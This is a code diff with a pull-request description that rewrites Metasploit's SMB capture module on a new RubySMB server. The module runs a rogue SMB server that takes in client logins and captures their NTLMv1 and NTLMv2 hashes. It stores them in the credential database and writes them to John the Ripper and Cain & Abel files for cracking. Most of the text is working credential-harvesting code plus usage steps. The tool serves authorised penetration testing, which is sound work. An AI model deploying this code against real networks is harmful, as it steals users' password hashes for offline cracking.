+        combined_hash = "#{type3_msg.user.encode}::#{type3_msg.domain.encode}"
+
+        case type3_msg.ntlm_version
+        when :ntlmv1
+          hash_type = 'NTLMv1-SSP'
+          client_hash = "#{bin_to_hex(type3_msg.lm_response)}:#{bin_to_hex(type3_msg.ntlm_response)}"
+
+          combined_hash << ":#{client_hash}"
+          combined_hash << ":#{bin_to_hex(@server_challenge)}"
+        when :ntlmv2
+          hash_type = 'NTLMv2-SSP'
+          client_hash = "#{bin_to_hex(type3_msg.ntlm_response[0...16])}:#{bin_to_hex(type3_msg.ntlm_response[16..-1])}"
+
+          combined_hash << ":#{bin_to_hex(@server_challenge)}"
+          combined_hash << ":#{client_hash}"
+        end
+
+        unless hash_type.nil?
+          puts "[SMB] #{hash_type} Client   : #{client}"
+          puts "[SMB] #{hash_type} Username : #{username}"
+          puts "[SMB] #{hash_type} Hash     : #{combined_hash}"
+          puts
+
+          if @provider.listener
+            jtr_format = type3_msg.ntlm_version == :ntlmv1 ? 'netntlm' : 'netntlmv2'
+            @provider.listener.on_cred(client, combined_hash, jtr_format, username,
+                                       @server_challenge, client_hash, type3_msg.domain.encode)
+          end
+        end
+
+        WindowsError::NTStatus::STATUS_ACCESS_DENIED
+      end
+    end
+
+    # Needs overwritten to ensure our version of Authenticator is returned
+    def new_authenticator(server_client)
+      # build and return an instance that can process and track stateful information for a particular connection but
+      # that's backed by this particular provider
+      Authenticator.new(self, server_client)
+    end
+
+    attr_reader :listener
+  end
+
+  def on_cred(address, combined_hash, jtr_format, username, server_challenge, client_hash, domain)
+    origin = create_credential_origin_service(
+      {
+        address: address,
+        port: datastore['SRVPORT'],
+        service_name: 'smb',
+        protocol: 'tcp',
+        module_fullname: fullname,
+        workspace_id: myworkspace_id
+      }
+    )
+
+    create_credential(
+      {
+        origin: origin,
+        origin_type: :service,
+        address: address,
+        service_name: 'smb',
+        port: datastore['SRVPORT'],
+        private_data: combined_hash,
+        private_type: :nonreplayable_hash,
+        jtr_format: jtr_format,
+        username: username,
+        module_fullname: fullname,
+        workspace_id: myworkspace_id
+      }
+    )
+
+    if datastore['JOHNPWFILE']
+      # JTR NTLM hash format NTLMv1
+      # Username::Domain:LMHash:NTHash:Challenge
+      #
+      # JTR NTLM hash format NTLMv2
+      # Username::Domain:Challenge:NTHash[0...16]:NTHash[16...-1]
+
+      File.open(File.expand_path(datastore['JOHNPWFILE'], Msf::Config.install_root), 'a') do |f|
+        f.puts(combined_hash)
+      end
+    end
+
+    # Cain & Abel doesn't support import of NTLMv2 hashes
+    if datastore['CAINPWFILE'] && jtr_format == 'netntlm'
+      # Cain&Abel hash format
+      # Username:Domain:Challenge:LMHash:NTLMHash
+      File.open(File.expand_path(datastore['CAINPWFILE'], Msf::Config.install_root), 'a') do |f|
+        f.puts("#{username}:#{domain}:#{server_challenge}:#{client_hash}")
+      end
+    end
   end
 
   def run
-    @s_smb_esn = datastore['SMB_EXTENDED_SECURITY']
-    @s_ntlm_esn = datastore['NTLM_UseNTLM2_session']
-    @s_gss_neg = datastore['USE_GSS_NEGOTIATION']
-    @domain_name = datastore['DOMAIN_NAME']
+    @rsock = Rex::Socket::Tcp.create(
+      'LocalHost' => datastore['SRVHOST'],
+      'LocalPort' => datastore['SRVPORT'],
+      'Server' => true,
+      'Timeout' => 3,
+      'Context' =>
+        {
+          'Msf' => framework,
+          'MsfExploit' => self
+        }
+    )
 
-    @s_GUID = [Rex::Text.rand_text_hex(32)].pack('H*')
-    if datastore['CHALLENGE'].to_s =~ /^([a-fA-F0-9]{16})$/
-      @challenge = [ datastore['CHALLENGE'] ].pack("H*")
-    else
-      print_error("CHALLENGE syntax must match 1122334455667788")
-      return
+    ntlm_provider = HashCaptureNTLMProvider.new(
+      listener: self
+    )
+
+    # Set domain name for all future server responses
+    ntlm_provider.dns_domain = datastore['DOMAIN_NAME']
+    ntlm_provider.dns_hostname = datastore['DOMAIN_NAME']
+    ntlm_provider.netbios_domain = datastore['DOMAIN_NAME']
+    ntlm_provider.netbios_hostname = datastore['DOMAIN_NAME']
+
+    if datastore['CHALLENGE']
+      if datastore['CHALLENGE'].to_s =~ /^([a-fA-F0-9]{16})$/
+        # Set challenge for all future server responses
+
+        chall = proc { [datastore['CHALLENGE']].pack('H*') }
+        ntlm_provider.generate_server_challenge(&chall)
+      else
+        print_warning("#{datastore['CHALLENGE']} is not a valid 16 character hexadecimal pattern, using a random pattern instead.")
+      end
     end
 
-    # those variables will prevent to spam the screen with identical hashes (works only with ntlmv1)
-    @previous_lm_hash="none"
-    @previous_ntlm_hash="none"
-    exploit
-  end
+    if datastore['JOHNPWFILE']
+      print_status("JTR hashes will be stored at #{File.expand_path(datastore['JOHNPWFILE'], Msf::Config.install_root)}")
+    end
 
-  def smb_cmd_dispatch(cmd, c, buff)
-    smb = @state[c]
-    pkt = CONST::SMB_BASE_PKT.make_struct
-    pkt.from_s(buff)
-    #Record the IDs
-    smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID']
-    smb[:user_id] = pkt['Payload']['SMB'].v['UserID']
-    smb[:tree_id] = pkt['Payload']['SMB'].v['TreeID']
-    smb[:multiplex_id] = pkt['Payload']['SMB'].v['MultiplexID']
+    if datastore['CAINPWFILE']
+      print_status("Cain & Abel hashes will be stored at #{File.expand_path(datastore['CAINPWFILE'], Msf::Config.install_root)}")
+    end
 
-    case cmd
-    when CONST::SMB_COM_NEGOTIATE
-      # client set extended security negotiation
-      if pkt['Payload']['SMB'].v['Flags2'] & 0x800 != 0
-        smb_cmd_negotiate(c, buff, true)
-      else
-        smb_cmd_negotiate(c, buff, false)
-      end
-    when CONST::SMB_COM_SESSION_SETUP_ANDX
+    server = RubySMB::Server.new(
+      server_sock: @rsock,
+      gss_provider: ntlm_provider
+    )
 
-      wordcount = pkt['Payload']['SMB'].v['WordCount']
+    print_status("Server is running. Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
 
-      # CIFS SMB_COM_SESSION_SETUP_ANDX request without smb extended security
-      # This packet contains the lm/ntlm hashes
-      if wordcount == 0x0D
-        smb_cmd_session_setup(c, buff)
-        #CIFS SMB_COM_SESSION_SETUP_ANDX request with smb extended security
-        # can be of type NTLMSS_NEGOCIATE or NTLMSSP_AUTH,
-      elsif wordcount == 0x0C
-        smb_cmd_session_setup_with_esn(c, buff)
-      else
-        print_status("SMB Capture - #{smb[:ip]} Unknown SMB_COM_SESSION_SETUP_ANDX request type , ignoring... ")
-        smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS, @s_smb_esn)
-      end
-
-    when CONST::SMB_COM_TREE_CONNECT
-
-      print_status("SMB Capture - Denying tree connect from #{smb[:name]} - #{smb[:ip]}")
-      smb_error(cmd, c, SMB_SMB_STATUS_ACCESS_DENIED, @s_smb_esn)
-
-    else
-      print_status("SMB Capture - Ignoring request from #{smb[:name]} - #{smb[:ip]} (#{cmd})")
-      smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS, @s_smb_esn)
+    server.run do
+      print_line
+      print_good "Received SMB connection on Auth Capture Server!"
+      true
     end
   end
 
-
-  def smb_cmd_negotiate(c, buff, c_esn)
-    smb = @state[c]
-    pkt = CONST::SMB_NEG_PKT.make_struct
-    pkt.from_s(buff)
-
-    group    = ''
-    machine  = smb[:nbsrc]
-
-    dialects = pkt['Payload'].v['Payload'].gsub(/\x00/, '').split(/\x02/).grep(/^\w+/)
-    # print_status("Negotiation from #{smb[:name]}: #{dialects.join(", ")}")
-
-    dialect =
-      dialects.index("NT LM 0.12") ||
-      dialects.length-1
-
-    pkt = CONST::SMB_NEG_RES_NT_PKT.make_struct
-    smb_set_defaults(c, pkt)
-
-    time_hi, time_lo = UTILS.time_unix_to_smb(Time.now.to_i)
-
-    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NEGOTIATE
-    pkt['Payload']['SMB'].v['Flags1'] = 0x88
-    pkt['Payload']['SMB'].v['WordCount'] = 17
-    pkt['Payload'].v['Dialect'] = dialect
-    pkt['Payload'].v['SecurityMode'] = 3
-    pkt['Payload'].v['MaxMPX'] = 2
-    pkt['Payload'].v['MaxVCS'] = 1
-    pkt['Payload'].v['MaxBuff'] = 4356
-    pkt['Payload'].v['MaxRaw'] = 65536
-    pkt['Payload'].v['SystemTimeLow'] = time_lo
-    pkt['Payload'].v['SystemTimeHigh'] = time_hi
-    pkt['Payload'].v['ServerTimeZone'] = 0x0
-    pkt['Payload'].v['SessionKey'] = 0
-
-    if c_esn && @s_smb_esn
-      pkt['Payload']['SMB'].v['Flags2'] = 0xc801
-      pkt['Payload'].v['Capabilities'] = 0x8000e3fd
-      pkt['Payload'].v['KeyLength'] = 0
-      pkt['Payload'].v['Payload'] = @s_GUID
-
-      if @s_gss_neg
-        pkt['Payload'].v['Payload'] += NTLM_UTILS::make_simple_negotiate_secblob_resp
-      end
-
-    else
-      pkt['Payload']['SMB'].v['Flags2'] = 0xc001
-      pkt['Payload'].v['Capabilities'] = 0xe3fd
-      pkt['Payload'].v['KeyLength'] = 8
-      pkt['Payload'].v['Payload'] = @challenge +
-        Rex::Text.to_unicode(group) + "\x00\x00" +
-        Rex::Text.to_unicode(machine) + "\x00\x00"
-    end
-
-    c.put(pkt.to_s)
-  end
-
-  def smb_cmd_session_setup(c, buff)
-    smb = @state[c]
-
-    pkt = CONST::SMB_SETUP_NTLMV1_PKT.make_struct
-    pkt.from_s(buff)
-
-    lm_len = pkt['Payload'].v['PasswordLenLM'] # Always 24
-    nt_len = pkt['Payload'].v['PasswordLenNT']
-
-    if nt_len == 24
-      arg = {
-        :ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE,
-        :lm_hash => pkt['Payload'].v['Payload'][0, lm_len].unpack("H*")[0],
-        :nt_hash => pkt['Payload'].v['Payload'][lm_len, nt_len].unpack("H*")[0]
-      }
-      # if the length of the ntlm response is not 24 then it will be bigger
-      # and represent an NTLMv2 response
-    elsif nt_len > 24
-      arg = {
-        :ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE,
-        :lm_hash => pkt['Payload'].v['Payload'][0, 16].unpack("H*")[0],
-        :lm_cli_challenge => pkt['Payload'].v['Payload'][16, 8].unpack("H*")[0],
-        :nt_hash => pkt['Payload'].v['Payload'][lm_len, 16].unpack("H*")[0],
-        :nt_cli_challenge => pkt['Payload'].v['Payload'][lm_len + 16, nt_len - 16].unpack("H*")[0]
-      }
-    elsif nt_len == 0
-      print_status("SMB Capture - Empty hash captured from #{smb[:name]} - #{smb[:ip]} captured, ignoring ... ")
-      smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
-      return
-    else
-      print_status("SMB Capture - Unknown hash type capture from #{smb[:name]} - #{smb[:ip]}, ignoring ...")
-      smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
-      return
-    end
-
-    buff = pkt['Payload'].v['Payload']
-    buff.slice!(0, lm_len + nt_len)
-    names = buff.split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
-
-    smb[:username] = names[0]
-    smb[:domain]   = names[1]
-    smb[:peer_os]  = names[2]
-    smb[:peer_lm]  = names[3]
-
-    begin
-      smb_get_hash(smb,arg,false)
-    rescue ::Exception => e
-      print_error("SMB Capture - Error processing Hash from #{smb[:name]} : #{e.class} #{e} #{e.backtrace}")
-    end
-
-    smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
-
-  end
-
-  def smb_cmd_session_setup_with_esn(c, buff)
-    smb = @state[c]
-
-    pkt = CONST::SMB_SETUP_NTLMV2_PKT.make_struct
-    pkt.from_s(buff)
-
-    securityblobLen = pkt['Payload'].v['SecurityBlobLen']
-    blob = pkt['Payload'].v['Payload'][0,securityblobLen]
-
-    # detect if GSS is being used
-    if blob[0,7] == 'NTLMSSP'
-      c_gss = false
-    else
-      c_gss = true
-      start = blob.index('NTLMSSP')
-      if start
-        blob.slice!(0,start)
-      else
-        print_status("SMB Capture - Error finding NTLM in SMB_COM_SESSION_SETUP_ANDX request from #{smb[:name]} - #{smb[:ip]}, ignoring ...")
-        smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
-        return
-      end
-
-    end
-    ntlm_message = NTLM_MESSAGE::parse(blob)
-
-    case ntlm_message
-    when NTLM_MESSAGE::Type1
-      # Send Session Setup AndX Response NTLMSSP_CHALLENGE response packet
-
-      if (ntlm_message.flag & NTLM_CONST::NEGOTIATE_NTLM2_KEY) != 0
-        c_ntlm_esn = true
-      else
-        c_ntlm_esn = false
-      end
-      pkt = CONST::SMB_SETUP_NTLMV2_RES_PKT.make_struct
-      pkt.from_s(buff)
-      smb_set_defaults(c, pkt)
-
-      pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX
-      pkt['Payload']['SMB'].v['ErrorClass'] = CONST::SMB_STATUS_MORE_PROCESSING_REQUIRED
-      pkt['Payload']['SMB'].v['Flags1'] = 0x88
-      pkt['Payload']['SMB'].v['Flags2'] = 0xc807
-      pkt['Payload']['SMB'].v['WordCount'] = 4
-      pkt['Payload']['SMB'].v['UserID'] = 2050
-      pkt['Payload'].v['AndX'] = 0xFF
-      pkt['Payload'].v['Reserved1'] = 0x00
-      pkt['Payload'].v['AndXOffset'] = 283 #ignored by client
-      pkt['Payload'].v['Action'] = 0x0000
-
-      win_domain = Rex::Text.to_unicode(@domain_name.upcase)
-      win_name = Rex::Text.to_unicode(@domain_name.upcase)
-      dns_domain = Rex::Text.to_unicode(@domain_name.downcase)
-      dns_name = Rex::Text.to_unicode(@domain_name.downcase)
-
-      # create the ntlmssp_challenge security blob
-      if c_ntlm_esn && @s_ntlm_esn
-        sb_flag = 0xe28a8215 # ntlm2
-      else
-        sb_flag = 0xe2828215 # no ntlm2
-      end
-      if c_gss
-        securityblob = NTLM_UTILS::make_ntlmssp_secblob_chall(
-          win_domain,
-          win_name,
-          dns_domain,
-          dns_name,
-          @challenge,
-          sb_flag
-        )
-      else
-        securityblob = NTLM_UTILS::make_ntlmssp_blob_chall(
-          win_domain,
-          win_name,
-          dns_domain,
-          dns_name,
-          @challenge,
-          sb_flag
-        )
-      end
-      pkt['Payload'].v['SecurityBlobLen'] = securityblob.length
-      pkt['Payload'].v['Payload'] = securityblob
-
-      c.put(pkt.to_s)
-
-    when NTLM_MESSAGE::Type3
-      # we can process the hash and send a status_logon_failure response packet
-
-      # Record the remote multiplex ID
-      smb[:multiplex_id] = pkt['Payload']['SMB'].v['MultiplexID']
-      lm_len = ntlm_message.lm_response.length # Always 24
-      nt_len = ntlm_message.ntlm_response.length
-
-      if nt_len == 24 # lmv1/ntlmv1 or ntlm2_session
-        arg = {
-          :ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE,
-          :lm_hash => ntlm_message.lm_response.unpack('H*')[0],
-          :nt_hash => ntlm_message.ntlm_response.unpack('H*')[0]
-        }
-
-        if @s_ntlm_esn && arg[:lm_hash][16,32] == '0' * 32
-          arg[:ntlm_ver] = NTLM_CONST::NTLM_2_SESSION_RESPONSE
-        end
-        # if the length of the ntlm response is not 24 then it will be
-        # bigger and represent an NTLMv2 response
-      elsif nt_len > 24 # lmv2/ntlmv2
-        arg = {
-          :ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE,
-          :lm_hash => ntlm_message.lm_response[0, 16].unpack('H*')[0],
-          :lm_cli_challenge => ntlm_message.lm_response[16, 8].unpack('H*')[0],
-          :nt_hash => ntlm_message.ntlm_response[0, 16].unpack('H*')[0],
-          :nt_cli_challenge => ntlm_message.ntlm_response[16, nt_len - 16].unpack('H*')[0]
-        }
-      elsif nt_len == 0
-        print_status("SMB Capture - Empty hash from #{smb[:name]} - #{smb[:ip]} captured, ignoring ... ")
-        smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
-        return
-      else
-        print_status("SMB Capture - Unknown hash type from #{smb[:name]} - #{smb[:ip]}, ignoring ...")
-        smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
-        return
-      end
-
-      buff = pkt['Payload'].v['Payload']
-      buff.slice!(0,securityblobLen)
-      names = buff.split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
-
-      smb[:username] = ntlm_message.user
-      smb[:domain]   = ntlm_message.domain
-      smb[:peer_os]  = names[0]
-      smb[:peer_lm]  = names[1]
-
-      begin
-        smb_get_hash(smb,arg,true)
-      rescue ::Exception => e
-        print_error("SMB Capture - Error processing Hash from #{smb[:name]} - #{smb[:ip]} : #{e.class} #{e} #{e.backtrace}")
-      end
-      smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
-    else
-      smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
-    end
-  end
-
-
-  def smb_get_hash(smb, arg = {}, esn=true)
-
-    ntlm_ver = arg[:ntlm_ver]
-
-    lm_hash = arg[:lm_hash]
-    nt_hash = arg[:nt_hash]
-
-    # These are not used for NTLM_V1_RESPONSE or NTLM_2_SESSION_RESPONSE, so
-    # it's fine if they're nil
-    lm_cli_challenge = arg[:lm_cli_challenge]
-    nt_cli_challenge = arg[:nt_cli_challenge]
-
-    # Clean up the data for logging
-    if smb[:username] == ""
-      smb[:username] = nil
-    end
-
-    if smb[:domain] == ""
-      smb[:domain] = nil
-    end
-
-    # Check if we have default values (empty pwd, null hashes, ...) and adjust
-    # the on-screen messages correctly
-    case ntlm_ver
-    when NTLM_CONST::NTLM_V1_RESPONSE
-      if NTLM_CRYPT::is_hash_from_empty_pwd?(
-        {
-          :hash => [nt_hash].pack("H*"),
-          :srv_challenge => @challenge,
-          :ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE,
-          :type => 'ntlm'
-        }
-      )
-        print_status("SMB Capture - NLMv1 Hash correspond to an empty password, ignoring ... #{smb[:ip]}")
-        return
-      end
-      if lm_hash == nt_hash or lm_hash == "" or lm_hash =~ /^0*$/
-        lm_hash_message = "Disabled"
-      elsif NTLM_CRYPT::is_hash_from_empty_pwd?(
-        {
-          :hash => [lm_hash].pack("H*"),
-          :srv_challenge => @challenge,
-          :ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE,
-          :type => 'lm'
-        }
-      )
-        lm_hash_message = "Disabled (from empty password)"
-      else
-        lm_hash_message = lm_hash
-        lm_chall_message = lm_cli_challenge
-      end
-    when NTLM_CONST::NTLM_V2_RESPONSE
-      if NTLM_CRYPT::is_hash_from_empty_pwd?(
-        {
-          :hash => [nt_hash].pack("H*"),
-          :srv_challenge => @challenge,
-          :cli_challenge => [nt_cli_challenge].pack("H*"),
-          :user => Rex::Text::to_ascii(smb[:username]),
-          :domain => Rex::Text::to_ascii(smb[:domain]),
-          :ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE,
-          :type => 'ntlm'
-        }
-      )
-        print_status("SMB Capture - NTLMv2 Hash correspond to an empty password, ignoring ... #{smb[:ip]}")
-        return
-      end
-
-      if lm_hash == '0' * 32 and lm_cli_challenge == '0' * 16
-        lm_hash_message = "Disabled"
-        lm_chall_message = 'Disabled'
-      elsif NTLM_CRYPT::is_hash_from_empty_pwd?(
-        {
-          :hash => [lm_hash].pack("H*"),
-          :srv_challenge => @challenge,
-          :cli_challenge => [lm_cli_challenge].pack("H*"),
-          :user => Rex::Text::to_ascii(smb[:username]),
-          :domain => Rex::Text::to_ascii(smb[:domain]),
-          :ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE,
-          :type => 'lm'
-        }
-      )
-        lm_hash_message = "Disabled (from empty password)"
-        lm_chall_message = 'Disabled'
-      else
-        lm_hash_message = lm_hash
-        lm_chall_message = lm_cli_challenge
-      end
-
-    when NTLM_CONST::NTLM_2_SESSION_RESPONSE
-      if NTLM_CRYPT::is_hash_from_empty_pwd?(
-        {
-          :hash => [nt_hash].pack("H*"),
-          :srv_challenge => @challenge,
-          :cli_challenge => [lm_hash].pack("H*")[0,8],
-          :ntlm_ver => NTLM_CONST::NTLM_2_SESSION_RESPONSE,
-          :type => 'ntlm'
-        }
-      )
-        print_status("SMB Capture - NTLM2_session Hash correspond to an empty password, ignoring ... #{smb[:ip]}")
-        return
-      end
-      lm_hash_message = lm_hash
-      lm_chall_message = lm_cli_challenge
-    end
-
-    # Display messages
-    if esn
-      smb[:username] = Rex::Text::to_ascii(smb[:username])
-      smb[:domain]   = Rex::Text::to_ascii(smb[:domain]) if smb[:domain]
-    end
-
-    capturedtime = Time.now.to_s
-    case ntlm_ver
-    when NTLM_CONST::NTLM_V1_RESPONSE
-      capturelogmessage = [
-        "SMB Captured - #{capturedtime}",
-        "NTLMv1 Response Captured from #{smb[:name]} - #{smb[:ip]}",
-        "USER:#{smb[:username]} DOMAIN:#{smb[:domain]} OS:#{smb[:peer_os]} LM:#{smb[:peer_lm]}",
-        "LMHASH:#{lm_hash_message ? lm_hash_message : "<NULL>"}",
-        "NTHASH:#{nt_hash ? nt_hash : "<NULL>"}",
-        ].join("\n")
-    when NTLM_CONST::NTLM_V2_RESPONSE
-      capturelogmessage = [
-        "SMB Captured - #{capturedtime}",
-        "NTLMv2 Response Captured from #{smb[:name]} - #{smb[:ip]}",
-        "USER:#{smb[:username]} DOMAIN:#{smb[:domain]} OS:#{smb[:peer_os]} LM:#{smb[:peer_lm]}",
-        "LMHASH:#{lm_hash_message ? lm_hash_message : "<NULL>"} ",
-        "LM_CLIENT_CHALLENGE:#{lm_chall_message ? lm_chall_message : "<NULL>"}",
-        "NTHASH:#{nt_hash ? nt_hash : "<NULL>"} ",
-        "NT_CLIENT_CHALLENGE:#{nt_cli_challenge ? nt_cli_challenge : "<NULL>"}",
-      ].join("\n")
-    when NTLM_CONST::NTLM_2_SESSION_RESPONSE
-      # we can consider those as netv1 has they have the same size and are
-      # cracked the same way by cain/jtr also 'real' netv1 is almost never
-      # seen nowadays except with smbmount or msf server capture
-      capturelogmessage = [
-        "SMB Captured - #{capturedtime}",
-        "NTLM2_SESSION Response Captured from #{smb[:name]} - #{smb[:ip]}",
-        "USER:#{smb[:username]} DOMAIN:#{smb[:domain]} OS:#{smb[:peer_os]} LM:#{smb[:peer_lm]}",
-        "NTHASH:#{nt_hash ? nt_hash : "<NULL>"}",
-        "NT_CLIENT_CHALLENGE:#{lm_hash_message ? lm_hash_message[0,16] : "<NULL>"} ",
-      ].join("\n")
-    else # should not happen
-      return
-    end
-
-    print_status(capturelogmessage)
-
-    report_note(
-      :host  => smb[:ip],
-      :type  => "smb_peer_os",
-      :data  => smb[:peer_os]
-    ) if (smb[:peer_os] and smb[:peer_os].strip.length > 0)
-
-    report_note(
-      :host  => smb[:ip],
-      :type  => "smb_peer_lm",
-      :data  => smb[:peer_lm]
-    ) if (smb[:peer_lm] and smb[:peer_lm].strip.length > 0)
-
-    report_note(
-      :host  => smb[:ip],
-      :type  => "smb_domain",
-      :data  => smb[:domain]
-    ) if (smb[:domain] and smb[:domain].strip.length > 0)
-
-    return unless smb[:username]
-
-    if datastore['CAINPWFILE'] and smb[:username]
-      if ntlm_ver == NTLM_CONST::NTLM_V1_RESPONSE or ntlm_ver == NTLM_CONST::NTLM_2_SESSION_RESPONSE
-        File.open(datastore['CAINPWFILE'], "ab") do |fd|
-          fd.puts(
-            [
-              smb[:username],
-              smb[:domain] ? smb[:domain] : "NULL",
-              @challenge.unpack("H*")[0],
-              lm_hash.empty? ? "0" * 48 : lm_hash,
-              nt_hash.empty? ? "0" * 48 : nt_hash
-            ].join(":").gsub(/\n/, "\\n")
-          )
-        end
-      end
-    end
-
-    return if @previous_lm_hash == lm_hash and @previous_ntlm_hash == nt_hash
-    @previous_lm_hash = lm_hash
-    @previous_ntlm_hash = nt_hash
-
-    creds = []
-
-    case ntlm_ver
-    when NTLM_CONST::NTLM_V1_RESPONSE,NTLM_CONST::NTLM_2_SESSION_RESPONSE
-      jtr_hash = [
-        smb[:username],"",
-        smb[:domain] ? smb[:domain] : "NULL",
-        lm_hash.empty? ? "0" * 48 : lm_hash,
-        nt_hash.empty? ? "0" * 48 : nt_hash,
-        @challenge.unpack("H*")[0]
-      ].join(":").strip
-
-      creds.push(jtr_format: 'netntlm', private_data: jtr_hash)
-
-    when NTLM_CONST::NTLM_V2_RESPONSE
-      # don't bother recording if LMv2 is disabled
-      unless lm_hash == '0'*32
-        # lmv2
-        jtr_hash = [
-          smb[:username],"",
-          smb[:domain] ? smb[:domain] : "NULL",
-          @challenge.unpack("H*")[0],
-          lm_hash,
-          lm_cli_challenge
-        ].join(":").strip
-
-        creds.push(jtr_format: 'netlmv2', private_data: jtr_hash)
-      end
-
-      # NTLMv2
-      jtr_hash = [
-        smb[:username],"",
-        smb[:domain] ? smb[:domain] : "NULL",
-        @challenge.unpack("H*")[0],
-        nt_hash.empty? ? "0" * 32 : nt_hash,
-        nt_cli_challenge.empty? ? "0" * 160 : nt_cli_challenge
-      ].join(":").strip
-
-      creds.push(jtr_format: 'netntlmv2', private_data: jtr_hash)
-
-    end
-
-    # TODO we probably need a new Origin::Capture for this
-    @origin ||= create_credential_origin_import(filename: 'msfconsole')
-
-    creds.each do |cred|
-      create_credential(
-        origin: @origin,
-        address: smb[:ip],
-        service_name: 'smb',
-        port: datastore['SRVPORT'],
-        private_data: cred[:private_data],
-        private_type: :nonreplayable_hash,
-        jtr_format: cred[:jtr_format],
-        username: smb[:username],
-        module_fullname: self.fullname,
-        workspace_id: myworkspace_id,
-      )
-      if datastore['JOHNPWFILE']
-        File.open(datastore['JOHNPWFILE'] + '_' + cred[:jtr_format] , "ab") do |fd|
-          fd.puts(cred[:private_data])
-        end
-      end
-    end
-
+  def cleanup
+    @rsock.close
+    super
   end
 end


### PR DESCRIPTION
Dependent on https://github.com/rapid7/ruby_smb/pull/177.

This PR rewrites the entirety of the `auxiliary/server/capture/smb.rb` module to use @zeroSteiner 's new RubySMB server implementation. As such, the module now handles `NTLMv1` and `NTLMv2`, as well as SMB1, SMB2, and SMB3.

This current implementation has been tested on Windows XP, 7, 8.1, 10, and Kali Linux.

Have also updated the docs to reflect new features, as well as testing all the original features in the docs to ensure there's no feature regression, as well as hooked up the module to store `cred` and `host` info with the hashes it captures.

Speaking of regression! We have pulled out the `SMB_EXTENDED_SECURITY`, `NTLM_UseNTLM2_session`, and `USE_GSS_NEGOTIATION` advanced options, for the following reasons:
- `USE_GSS_NEGOTIATION` - The new SMB server is dependent on GSS negotiation, so there was no way around keeping this feature.   
- `SMB_EXTENDED_SECURITY` - Keeping this would have been required a fair amount of overwriting the `RubySMB::Server` methods to alter packet values at the initial stages of communication. Since that defeats the purpose of the Server and this option was set to false and made no alterations by default, it was removed.
- `NTLM_UseNTLM2_session` - Only came into play when `SMB_EXTENDED_SECURITY` was set to true. Removed for the same reasons.

It should also be noted that the above options would only affect communication with clients that **ONLY** supported SMB1. This is, _IIRC_, windows versions earlier than XP, which is a very small sliver of the ecosystem, and not worth holding up the overhaul for.

## Verification

- [ ] Start msfconsole
- [ ] Connect DB
- [ ] Do: `use auxiliary/server/capture/smb`
- [ ] Do: `run`
- [ ] Connect to above server with your SMB client of choice
- [ ] Observe the capturing of hash
- [ ] `creds`
- [ ] check hash has been stored in DB correctly


TODO:
`type1_msg.os_version` value isn't human readable, and instead returns major,minor,build values. There isn't a nice method to convert those values to a human readable string that I'm aware of, so I'll look around for one to pull in or failing that write one myself. You can see how that code should operate by following the commented out code containing calls to the `client_os_version` variable.
